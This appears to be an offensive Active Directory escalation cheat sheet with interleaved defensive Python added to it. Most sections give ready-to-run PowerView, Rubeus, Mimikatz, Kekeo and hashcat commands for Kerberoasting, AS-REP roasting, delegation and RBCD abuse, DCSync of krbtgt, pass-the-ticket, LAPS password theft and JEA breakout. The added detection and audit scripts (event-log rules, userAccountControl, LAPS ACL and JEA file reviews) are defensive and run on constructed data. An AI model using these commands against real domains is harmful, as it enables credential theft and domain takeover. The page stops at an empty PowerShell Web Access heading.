# Escalation

## Kerberoasting

#### Finding Service Accounts

{% tabs %}
{% tab title="PowerView" %}

```
Get-NetUser -SPN
```

{% endtab %}

{% tab title="ADModule" %}

```
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```

{% endtab %}
{% endtabs %}

#### Request TGS

{% tabs %}
{% tab title="PowerShell Native" %}

```
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" 
```

{% endtab %}

{% tab title="PowerView" %}

```
Request-SPNTicket 
```

{% endtab %}
{% endtabs %}

#### Exporting / Cracking

{% tabs %}
{% tab title="Rubeus / Hashcat" %}

```
# Roast
Rubeus.exe kerberoast /simple /nowrap [/user:USER] [/domain:DOMAIN] [/dc:DC]

# Crack
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
```

{% endtab %}

{% tab title="Mimikatz / TGSRepCrack" %}

```
# Check they have been granted:
klist

# Export using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"' 

# Crack
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\240a10000-student.kirbi 
```

{% endtab %}
{% endtabs %}

## AS-REP Roasting

#### Finding Accounts with Kerberos pre-auth disabled

{% tabs %}
{% tab title="PowerView\_dev" %}

```
Get-DomainUser -PreauthNotRequired -Verbose
```

{% endtab %}

{% tab title="ADModule" %}

```
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

{% endtab %}
{% endtabs %}

#### Force-disable Kerberos pre-auth

{% tabs %}
{% tab title="PowerView\_dev" %}

```
# Checking current groups ACL rights:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Disabling kerberos pre-auth for a user:
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
```

{% endtab %}
{% endtabs %}

#### ASREPRoast

{% tabs %}
{% tab title="Rubeus" %}

```
# Get the hashes of all
Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH] 

# Crack with hashcat
hashcat asreproast.txt -m 18200 /usr/share/wordlists/rockyou.txt --force
```

{% endtab %}

{% tab title="Invoke-ASREPRoast" %}

```
# Use ASREPRoast:
Get-ASREPHash -UserName VPN1user -Verbose

# Do all automatically:
Invoke-ASREPRoast -Verbose

# Crack using John
./john vpn1user.txt --wordlist=wordlist.txt
```

{% endtab %}
{% endtabs %}
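Detection logic for the three activities above (Kerberoasting, AS-REP roasting, and the userAccountControl change that switches pre-auth off), written as an added example that is not part of the original page or of any tool it names. It runs over Windows Security events modelled on the EventData fields of 4769, 4768 and 4738; the field names are the real ones, every value in the sample log is constructed, and the burst threshold and window are assumptions to tune per environment.

```python
"""Detection logic for Kerberoasting, AS-REP roasting and pre-auth tampering.

Added example (not from the original page or any tool it names). It runs over
Windows Security events modelled on the EventData fields of 4769 (service ticket
requested), 4768 (TGT requested) and 4738 (user account changed). The field
names are the real ones from those events; every value is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType roasting tools request because it cracks fastest
NO_PREAUTH = "0"    # 4768 PreAuthType 0: the TGT was issued without pre-authentication

# Constructed sample log: a roasting burst by student1, one AS-REP request for an
# account without pre-auth, and one account change that switches pre-auth off.
EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "student1@DCORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "student1@DCORP.LOCAL",
     "ServiceName": "svc_http", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:03", "TargetUserName": "student1@DCORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:04", "TargetUserName": "student1@DCORP.LOCAL",
     "ServiceName": "DCORP-MGMT$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:30:00", "TargetUserName": "alice@DCORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.7"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:31:00", "TargetUserName": "vpn1user",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:31:05", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.7"},
    {"EventID": 4738, "TimeCreated": "2024-05-01T10:32:00", "TargetUserName": "control1user",
     "SubjectUserName": "student1", "UserAccountControl": "'Don't Require Preauth' - Enabled"},
    {"EventID": 4738, "TimeCreated": "2024-05-01T10:33:00", "TargetUserName": "bob",
     "SubjectUserName": "helpdesk1", "UserAccountControl": "'Password Not Required' - Disabled"},
]


def _when(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def detect_kerberoast(events, threshold=3, window=timedelta(minutes=5)):
    """One alert per (requester, source IP) that pulls RC4 tickets for at least
    `threshold` distinct user-account SPNs inside `window` (both assumptions)."""
    per_requester = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        # Computer accounts (name$) and krbtgt are not crackable roasting targets,
        # so skipping them keeps the rule quiet on normal machine traffic.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[(ev["TargetUserName"], ev["IpAddress"])].append((_when(ev), svc))
    alerts = []
    for (user, ip), requests in per_requester.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            services = {svc for when, svc in requests[i:] if when - start <= window}
            if len(services) >= threshold:
                alerts.append({"rule": "kerberoast", "user": user, "ip": ip,
                               "services": sorted(services)})
                break
    return alerts


def detect_asrep_roast(events):
    """4768 without pre-authentication and with an RC4 ticket: the AS-REP is crackable."""
    return [{"rule": "asrep_roast", "account": ev["TargetUserName"], "ip": ev["IpAddress"]}
            for ev in events
            if ev["EventID"] == 4768 and ev.get("PreAuthType") == NO_PREAUTH
            and ev["TicketEncryptionType"].lower() == RC4_HMAC]


def detect_preauth_disabled(events):
    """4738 whose UserAccountControl text shows pre-auth being switched off; this is
    the change the Set-DomainObject -XOR command above produces."""
    return [{"rule": "preauth_disabled", "account": ev["TargetUserName"], "by": ev["SubjectUserName"]}
            for ev in events
            if ev["EventID"] == 4738
            and "'don't require preauth' - enabled" in ev["UserAccountControl"].lower()]


def run_all(events):
    return {"kerberoast": detect_kerberoast(events),
            "asrep_roast": detect_asrep_roast(events),
            "preauth_disabled": detect_preauth_disabled(events)}


if __name__ == "__main__":
    for rule, hits in run_all(EVENTS).items():
        print(rule, hits)
```

The Kerberoast rule deliberately keys on the requesting user plus source IP and counts distinct SPNs rather than raw 4769 volume, because a single RC4 ticket request is normal wherever a legacy service still lacks AES keys; the remediation signal is the same in both cases (set AES on the service account, use a long random password or a gMSA).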

## SetSPN - Targeted Kerberoasting

#### Enumeration

{% tabs %}
{% tab title="PowerView\_dev" %}

```
# Viewing our ACL permissions:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Check if user has SPN:
Get-DomainUser -Identity supportuser | select serviceprincipalname
```

{% endtab %}

{% tab title="ADModule" %}

```
# Check if user has SPN already:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
```

{% endtab %}
{% endtabs %}

#### Setting SPN (must be unique for domain)

{% tabs %}
{% tab title="PowerView / SharpView" %}

```
Set-DomainObject -Identity USER -SET @{serviceprincipalname='ops/whatever1'}

## Clean up
Set-DomainObject -Identity USER -clear serviceprincipalname
```

{% endtab %}

{% tab title="ADModule" %}

```
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
```

{% endtab %}
{% endtabs %}

Extraction and cracking are the same as for Kerberoasting.

## Unconstrained Delegation

#### Enumeration

{% tabs %}
{% tab title="PowerView" %}

```
Get-NetComputer -UnConstrained
```

{% endtab %}

{% tab title="ADModule" %}

```
Get-ADComputer -Filter {TrustedForDelegation -eq $True} 
Get-ADUser -Filter {TrustedForDelegation -eq $True}
```

{% endtab %}
{% endtabs %}

#### Compromise the server and wait, or use the printer bug with Rubeus listening

```
# Printer bug https://github.com/leechristensen/SpoolSample

# Listen with Rubeus
.\Rubeus.exe monitor /interval:5 

# Use printer bug
.\SpoolSample_v4.5_x64.exe TARGET CAPTURE

# Use ticket
Rubeus.exe ptt /ticket:<base64ticket>
```

#### Export tickets and steal DA

{% tabs %}
{% tab title="Rubeus" %}

```
# Look at tickets on system (run as system to see all)
Rubeus.exe triage

# Get ticket
Rubeus.exe dump /luid:TICKETLUID /nowrap

# Use ticket
Rubeus.exe ptt [/ticket:BASE64TICKET] [/luid:LUID]
```

{% endtab %}

{% tab title="MimiKatz" %}

```
# Export: 
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# PTT:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Documents\user1\[0;2ceb8b3]-2.kirbi"' 
```

{% endtab %}
{% endtabs %}

## Constrained Delegation

#### Enumeration

{% tabs %}
{% tab title="PowerView\_dev" %}

```
# Which User/Comp
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# What can the found users/comps do
Get-DomainUser USER -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto
Get-DomainComputer COMP -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto
```

{% endtab %}

{% tab title="ADModule" %}

```
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

{% endtab %}
{% endtabs %}

#### Getting Ticket

This needs the NTLM hash or cleartext credentials of the user (or computer) account that has constrained delegation configured.

{% tabs %}
{% tab title="Rubeus" %}

```
===DCSYNC===
# On a computer with constrained delegation rights for time\dcorp-dc.
# hash is of the machine account
Rubeus.exe s4u /user:COMP$ /rc4:HASH /impersonateuser:Administrator /msdsspn:"time/DC.DOMAIN.LOCAL" /altservice:LDAP,cifs /ptt

#DCsync
dcsync DOMAIN DOMAIN\krbtgt

===FILESHARE===
# On user with constrained delegation rights for CIFS\COMP
# Hash is of the user with delegation rights
Rubeus.exe s4u /user:USER /rc4:HASH /impersonateuser:Administrator /msdsspn:"CIFS/COMP" /ptt

# Check Access
ls \\COMP\c$\
```

{% endtab %}

{% tab title="Kekeo" %}

```
===DCSYNC===
## Request TGT with Kekeo
tgt::ask /user:COMP$ /domain:DOMAIN /rc4:HASH

## Request TGS with Kekeo
tgs::s4u /tgt:TGT.kirbi /user:Administrator@DOMAIN /service:time/DC.DOMAIN.local|ldap/DC.DOMAIN.local

## Extract Ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'

## DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\krbtgt"'
 
===FILE SHARE===
## Request TGT with Kekeo
kekeo# tgt::ask /user:USER /domain:DOMAIN /rc4:HASH

## Next request TGS with kekeo (note cifs service id on end)
tgs::s4u /tgt:TGT_.kirbi /user:Administrator@DOMAIN /service:cifs/COMP-FQDN
 
## Inject ticket with mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'

## Check it worked 
ls \\COMP-FQDN\c$
```

{% endtab %}
{% endtabs %}
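The enumeration commands in the unconstrained and constrained delegation sections above, and the AS-REP section's `useraccountcontrol=4194304`, all come down to bits of the `userAccountControl` attribute. The audit below decodes those bits and reports the account states a defender wants to remove; it is an added example, not code from the page or any project it names. The account records are constructed inline in the shape an LDAP query returns, and the privileged-group set is an assumption.

```python
"""Audit of userAccountControl bits behind the delegation and roasting paths above.

Added example, not from the page or any project it names. The account records
are constructed inline in the shape an LDAP query returns (samAccountName,
userAccountControl, servicePrincipalName, msDS-AllowedToDelegateTo, memberOf).
"""
# Bit values of the LDAP userAccountControl attribute (MS-ADTS 2.2.16).
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000            # member server / workstation
SERVER_TRUST_ACCOUNT = 0x2000                 # domain controller
TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
NOT_DELEGATED = 0x100000                      # "account is sensitive and cannot be delegated"
DONT_REQ_PREAUTH = 0x400000                   # 4194304, the bit the page XORs in
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained delegation with protocol transition

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumption

# Constructed sample directory: one DC, one app server, and a few user accounts.
ACCOUNTS = [
    {"samAccountName": "dcorp-dc$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"samAccountName": "dcorp-appsrv$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"samAccountName": "vpn1user", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"samAccountName": "websvc", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dcorp-mgmt.dcorp.local"]},
    {"samAccountName": "Administrator", "userAccountControl": NORMAL_ACCOUNT, "memberOf": ["Domain Admins"]},
    {"samAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT, "memberOf": ["Domain Admins"],
     "servicePrincipalName": ["MSSQLSvc/dcorp-mgmt.dcorp.local:1433"]},
    {"samAccountName": "alice", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED, "memberOf": []},
]


def audit_account(acct):
    """Return the list of risk findings for one account record."""
    uac = acct["userAccountControl"]
    privileged = PRIVILEGED_GROUPS & set(acct.get("memberOf", []))
    findings = []
    if uac & DONT_REQ_PREAUTH:
        findings.append("AS-REP roastable: pre-authentication not required")
    if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
        # DCs are trusted for delegation by design; any other host collects TGTs.
        findings.append("unconstrained delegation on a non-DC account")
    targets = acct.get("msDS-AllowedToDelegateTo", [])
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        findings.append("constrained delegation with protocol transition (S4U2Self) to: " + ", ".join(targets))
    elif targets:
        findings.append("constrained delegation (Kerberos only) to: " + ", ".join(targets))
    if privileged and not uac & NOT_DELEGATED:
        findings.append("privileged account without 'sensitive and cannot be delegated'")
    if privileged and acct.get("servicePrincipalName"):
        findings.append("privileged account has an SPN (Kerberoastable)")
    return findings


def audit(accounts):
    """Map samAccountName -> findings for every account that has at least one."""
    result = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            result[acct["samAccountName"]] = findings
    return result


if __name__ == "__main__":
    for name, findings in audit(ACCOUNTS).items():
        print(name, findings)
```

The DC exception matters: every domain controller carries TRUSTED_FOR_DELEGATION, so a rule that flags the bit alone produces nothing but noise; the finding is the bit on anything that is not a DC, which is exactly what the printer-bug relay above needs.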

## Resource Based Constrained Delegation

#### Enumeration

```
# ACLs can be found with BloodHound, Invoke-ACLScanner, Get-ObjectAcl, etc.
# Need to control a machine with an SPN, or the ability to add a domain machine (normal user)
# Also need write permission on the target computer object
```

#### Adding New Computer Object

```
Import-Module .\Powermad.psd1

New-MachineAccount -Domain offensiveps.powershell.local -DomainController 192.168.2.1 -MachineAccount AttackCompObj -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose
```

#### Set RBCD on target

```
# Import AD Module
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

# Set RBCD on Target
Set-ADComputer <targethostname> -PrincipalsAllowedToDelegateToAccount <AttackCompObj>$ -Verbose 
```

#### Control Target

```
# Create hash of plaintext password if creating a new machine 
.\Rubeus.exe hash /password:<computerobjpassword>

# Request TGS 
.\Rubeus.exe s4u /user:AttackCompObj$ /rc4:HASH /msdsspn:http/<target> /impersonateuser:Administrator /ptt

# HTTP allows psremote
Enter-PSSession -ComputerName <target>
```
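Each step of the RBCD chain above, and the SPN write in the targeted Kerberoasting section, leaves a directory-change record: a new computer object (event 4741) and attribute writes (event 5136). The detector below is an added example, not code from the page; the events are constructed inline and modelled on the real EventData field names of 5136 and 4741, and the allowlist of accounts that may create machine accounts is an assumption.

```python
"""Directory-change detections for the delegation and SPN writes described above.

Added example, not from the page. Events are constructed inline and modelled on
the EventData fields of 5136 (directory service object modified) and 4741
(computer account created); the values are made up.
"""
VALUE_ADDED = "%%14674"      # 5136 OperationType for "Value Added" (%%14675 = Value Deleted)

# lower-cased attribute name -> (rule id, what the write means)
WATCHED_ATTRIBUTES = {
    "serviceprincipalname": ("targeted-kerberoast", "SPN written to a user account"),
    "msds-allowedtoactonbehalfofotheridentity": ("rbcd", "RBCD descriptor written to a computer"),
    "msds-allowedtodelegateto": ("constrained-delegation", "delegation target list written"),
}
# Assumption: accounts that legitimately join machines to the domain.
MACHINE_CREATORS_ALLOWED = {"svc_sccm", "Administrator"}

# Constructed sample log following the RBCD and targeted-Kerberoast steps above.
EVENTS = [
    {"EventID": 5136, "ObjectClass": "user", "ObjectDN": "CN=supportuser,CN=Users,DC=dcorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "ops/whatever1",
     "OperationType": "%%14674", "SubjectUserName": "student1"},
    {"EventID": 5136, "ObjectClass": "computer", "ObjectDN": "CN=WS01,CN=Computers,DC=dcorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HOST/ws01.dcorp.local",
     "OperationType": "%%14674", "SubjectUserName": "WS01$"},
    {"EventID": 5136, "ObjectClass": "computer", "ObjectDN": "CN=DCORP-MGMT,CN=Computers,DC=dcorp,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "AttributeValue": "<security descriptor>", "OperationType": "%%14674", "SubjectUserName": "student1"},
    {"EventID": 5136, "ObjectClass": "user", "ObjectDN": "CN=supportuser,CN=Users,DC=dcorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "ops/whatever1",
     "OperationType": "%%14675", "SubjectUserName": "student1"},
    {"EventID": 4741, "TargetUserName": "AttackCompObj$", "SubjectUserName": "student1"},
    {"EventID": 4741, "TargetUserName": "WS02$", "SubjectUserName": "svc_sccm"},
    {"EventID": 5136, "ObjectClass": "user", "ObjectDN": "CN=websvc,CN=Users,DC=dcorp,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToDelegateTo", "AttributeValue": "time/dcorp-dc.dcorp.local",
     "OperationType": "%%14674", "SubjectUserName": "Administrator"},
]


def detect_directory_changes(events):
    """Return one alert per suspicious attribute write or machine-account creation."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 5136:
            attr = ev["AttributeLDAPDisplayName"].lower()
            if attr not in WATCHED_ATTRIBUTES or ev["OperationType"] != VALUE_ADDED:
                continue  # only additions matter; the clean-up delete is not an alert
            if attr == "serviceprincipalname" and ev["ObjectClass"] != "user":
                continue  # computers receive SPNs routinely; a user SPN is the roasting prep
            rule, meaning = WATCHED_ATTRIBUTES[attr]
            alerts.append({"rule": rule, "meaning": meaning, "object": ev["ObjectDN"],
                           "value": ev["AttributeValue"], "by": ev["SubjectUserName"]})
        elif ev["EventID"] == 4741 and ev["SubjectUserName"] not in MACHINE_CREATORS_ALLOWED:
            alerts.append({"rule": "machine-account-created",
                           "meaning": "computer object added by a non-provisioning account",
                           "object": ev["TargetUserName"], "value": "", "by": ev["SubjectUserName"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_directory_changes(EVENTS):
        print(alert)
```

These events only exist when the "Audit Directory Service Changes" subcategory is enabled and the objects carry a SACL for attribute writes; without that, the RBCD descriptor write and the user SPN write are silent, which is the configuration gap to close first.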

## LAPS Abuse

#### Enumeration

{% tabs %}
{% tab title="LAPS Module" %}

```
# Easiest done with the LAPS powershell module

# Get OU with powerview
Get-NetOU

# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
```

{% endtab %}

{% tab title="PowerView" %}

```
# Basic but reliable
Get-NetOU -FullData

# Script to get in nice format (unreliable)
Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ } 
```

{% endtab %}
{% endtabs %}

#### Abuse

{% tabs %}
{% tab title="LAPS Module" %}

```
# Once we have compromised a user that sits within an OU that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

# After gaining password you can log in to machine as <targetmachine>\Administrator

# If we have SYSTEM on a LAPS machine, we can alter the password expiration time so we can persist longer on the machine.

# If we have DA we can modify ACLs of computer objects to provide attackers with permissions to read passwords in clear.

# Client component (C:\Program Files\LAPS\CSE\AdmPwd.dll) has no integrity check and can be replaced with malicious dll for attacks such as known password, long expiration time etc.
```

{% endtab %}

{% tab title="PowerView" %}

```
# Once we have compromised user with privs:
Get-ADObject -SamAccountName <targetmachine$> | select -ExpandProperty ms-mcs-admpwd
```

{% endtab %}

{% tab title="ADModule" %}

```
# Once we have compromised user with privs:
Get-ADComputer -Identity <targetmachine> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd
```

{% endtab %}
{% endtabs %}
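The PowerView one-liner in the enumeration section filters ACEs for `ReadProperty` on `ms-Mcs-AdmPwd`; the audit below does the same over resolved ACEs and reports every identity outside an expected set, which is the review a defender runs on each OU before trusting LAPS. It is an added example, not the page's or PowerView's code; the ACEs are constructed inline in the shape `Get-ObjectAcl -ResolveGUIDs` returns, and the expected-reader set is an assumption.

```python
"""Audit of who can read ms-Mcs-AdmPwd, the check behind the LAPS enumeration above.

Added example, not from the page. The ACEs are constructed inline in the shape
PowerView's Get-ObjectAcl -ResolveGUIDs returns (ObjectDN, IdentityReference,
ActiveDirectoryRights, ObjectType, AccessControlType); the expected-reader set
is an assumption for the example.
"""
from collections import defaultdict

EXPECTED_READERS = {"DCORP\\Domain Admins", "NT AUTHORITY\\SYSTEM"}   # assumption
READ_RIGHTS = {"ReadProperty", "ExtendedRight", "GenericAll", "GenericRead"}
LAPS_ATTR = "ms-Mcs-AdmPwd"

# Constructed ACEs over two OUs; only two of them should come out as findings.
ACES = [
    {"ObjectDN": "OU=Servers,DC=dcorp,DC=local", "IdentityReference": "DCORP\\Domain Admins",
     "ActiveDirectoryRights": "ReadProperty, ExtendedRight", "ObjectType": LAPS_ATTR, "AccessControlType": "Allow"},
    {"ObjectDN": "OU=Servers,DC=dcorp,DC=local", "IdentityReference": "DCORP\\RDPUsers",
     "ActiveDirectoryRights": "ReadProperty, ExtendedRight", "ObjectType": LAPS_ATTR, "AccessControlType": "Allow"},
    {"ObjectDN": "OU=Servers,DC=dcorp,DC=local", "IdentityReference": "DCORP\\Helpdesk",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Allow"},
    {"ObjectDN": "OU=Workstations,DC=dcorp,DC=local", "IdentityReference": "DCORP\\RDPUsers",
     "ActiveDirectoryRights": "ReadProperty", "ObjectType": "description", "AccessControlType": "Allow"},
    {"ObjectDN": "OU=Workstations,DC=dcorp,DC=local", "IdentityReference": "DCORP\\Contractors",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectType": LAPS_ATTR, "AccessControlType": "Deny"},
    {"ObjectDN": "OU=Workstations,DC=dcorp,DC=local", "IdentityReference": "NT AUTHORITY\\SYSTEM",
     "ActiveDirectoryRights": "GenericAll", "ObjectType": "All", "AccessControlType": "Allow"},
]


def can_read_laps(ace):
    """True when an Allow ACE grants read access to ms-Mcs-AdmPwd."""
    if ace["AccessControlType"] != "Allow":
        return False
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    if not rights & READ_RIGHTS:
        return False
    if rights & {"GenericAll", "GenericRead"}:
        return True                       # covers every attribute, the password included
    # Property-specific ACE: ObjectType names the attribute, or "All" for all properties
    # (an ExtendedRight ACE on "All" also covers the confidential-attribute read).
    return ace.get("ObjectType", "All") in (LAPS_ATTR, "All")


def unexpected_laps_readers(aces):
    """Map object DN -> identities outside EXPECTED_READERS that can read the password."""
    readers = defaultdict(set)
    for ace in aces:
        if can_read_laps(ace) and ace["IdentityReference"] not in EXPECTED_READERS:
            readers[ace["ObjectDN"]].add(ace["IdentityReference"])
    return {dn: sorted(ids) for dn, ids in readers.items()}


if __name__ == "__main__":
    for dn, ids in unexpected_laps_readers(ACES).items():
        print(dn, ids)
```

GenericAll ACEs are the ones the page's `ObjectType -like 'ms-Mcs-AdmPwd'` filter misses, which is why the helpdesk group shows up here but would not in that one-liner.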

## Just Enough Administration (JEA) Abuse

JEA lets non-admin users PSRemote into an endpoint through restricted session configurations. The session is constrained, but the configuration may run as an administrator, so breaking out of the configuration's confines makes you an admin of the box.

#### Enumeration

```
# Check AD descriptions. So far haven't seen any official way to scan for them.

# Role Capability file (Visible cmdlets etc)
New-PSRoleCapabilityFile -Path .\JEA.psrc

# Session configuration files (user mappings and role definitions)
New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -Path .\JEA.pssc
Register-PSSessionConfiguration -Path .\JEA.pssc -Name 'Persist' -Force 

# If you can find .pssc or .psrc files then they can help breakout. 
```

#### Abuse

```
# Connect to JEA endpoint
Enter-PSSession -ComputerName <target> -ConfigurationName <config name>

# Enum commands available, look them up in docs to see what is possible
Get-Command 

# Some dangerous cmdlets
start-process 
add-computer
new-iissite
set-pssessionconfiguration (set-pssessionconfiguration -Name <profilename> -SecurityDescriptorSDDL <SDDL>)(https://gist.github.com/jborean93/6d9aaf868d1d40344188984ebb431b04)
```
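The breakout cmdlets listed above are exactly what a review of a role-capability file should catch before the endpoint is registered. The script below is an added example, not the page's or any project's code: it pulls the visible command names out of a constructed `.psrc`, flags wildcards and the page's dangerous cmdlets (plus `Invoke-Command`), and reads `RunAsVirtualAccount` from a constructed `.pssc` to say whether a breakout lands as an admin. The files and the dangerous list are assumptions; hashtable entries are expected on one line.

```python
"""Review of a JEA role-capability (.psrc) and session-configuration (.pssc) file.

Added example, not from the page. Both files below are constructed; the
dangerous-cmdlet list is the page's list plus Invoke-Command.
"""
import re

DANGEROUS = {"start-process", "add-computer", "new-iissite",
             "set-pssessionconfiguration", "invoke-command"}
# Top-level keys a .psrc can contain; used to find where one value ends.
PSRC_KEYS = ("VisibleCmdlets", "VisibleFunctions", "VisibleExternalCommands", "VisibleAliases",
             "VisibleProviders", "FunctionDefinitions", "AliasDefinitions", "VariableDefinitions",
             "ModulesToImport", "ScriptsToProcess", "EnvironmentVariables", "TypesToProcess",
             "FormatsToProcess", "AssembliesToLoad", "GUID", "Author", "CompanyName",
             "Copyright", "Description")

SAMPLE_PSRC = r"""@{
    GUID = '00000000-0000-0000-0000-000000000000'
    Author = 'constructed example'
    VisibleCmdlets = 'Restart-Service', @{ Name = 'Get-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }, 'Start-Process', 'Get-*'
    VisibleFunctions = 'Get-Uptime'
    VisibleExternalCommands = 'C:\Windows\System32\whoami.exe'
}"""

SAMPLE_PSSC = r"""@{
    SessionType = 'RestrictedRemoteServer'
    RunAsVirtualAccount = $true
    RoleDefinitions = @{ 'DCORP\RDPUsers' = @{ RoleCapabilities = 'JEA' } }
}"""


def _value_block(text, key):
    """Raw text of `key = ...` up to the next top-level key or the closing brace."""
    keys = "|".join(PSRC_KEYS)
    m = re.search(rf"^\s*{key}\s*=\s*(.*?)(?=^\s*(?:{keys})\s*=|\}}\s*\Z)", text, re.S | re.M)
    return m.group(1) if m else ""


def _entries(block):
    """Command names in a psrc value: bare quoted strings at depth 0 and the
    Name = '...' of a top-level hashtable entry; nested Parameters are skipped."""
    names, depth, i = [], 0, 0
    while i < len(block):
        ch = block[i]
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
        elif ch == "'":
            j = block.index("'", i + 1)
            text = block[i + 1:j]
            before = block[:i].rstrip()
            if depth == 0 or (depth == 1 and re.search(r"\bName\s*=$", before)):
                names.append(text)
            i = j
        i += 1
    return names


def review_jea(psrc_text, pssc_text):
    """Findings per visible command, plus whether the endpoint runs as a virtual admin."""
    findings = []
    for key in ("VisibleCmdlets", "VisibleFunctions", "VisibleExternalCommands"):
        for name in _entries(_value_block(psrc_text, key)):
            if "*" in name:
                findings.append((key, name, "wildcard: every matching command is exposed"))
            elif name.lower() in DANGEROUS:
                findings.append((key, name, "known breakout cmdlet"))
    run_as_admin = re.search(r"RunAsVirtualAccount\s*=\s*\$true", pssc_text, re.I) is not None
    return {"run_as_admin": run_as_admin, "findings": findings}


if __name__ == "__main__":
    print(review_jea(SAMPLE_PSRC, SAMPLE_PSSC))
```

Whether a dangerous cmdlet is reachable also depends on the parameter restrictions in the hashtable form (`ValidateSet`, `ValidatePattern`), so a `Get-Service` entry constrained to one name is fine while a bare `Start-Process` string is not; the scanner keeps the two forms apart for that reason.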

## PowerShell Web Access (PSWA) Abuse

#### Enumeration
